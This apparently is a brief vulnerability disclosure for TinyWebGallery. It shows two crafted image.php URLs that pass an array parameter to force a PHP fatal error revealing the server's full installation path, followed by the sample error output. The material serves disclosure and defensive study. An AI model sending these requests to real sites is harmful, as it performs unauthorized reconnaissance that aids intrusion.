The attacker can get the full path of the installation of TinyWebGallery browsing to any of this urls:
http://vulnerablesite.com/tw/image.php?fontscale=1&twg_browserx[]=1706&twg_browsery=890&twg_xmlhttp=r
http://vulnerablesite.com/tw/image.php?fontscale=1&twg_browserx=1706&twg_browsery[]=890&twg_xmlhttp=r
The information obtained contains the full path to the files:
Fatal error: Unsupported operand types in /var/www/tw/inc/ajaxserver.inc.php on line 157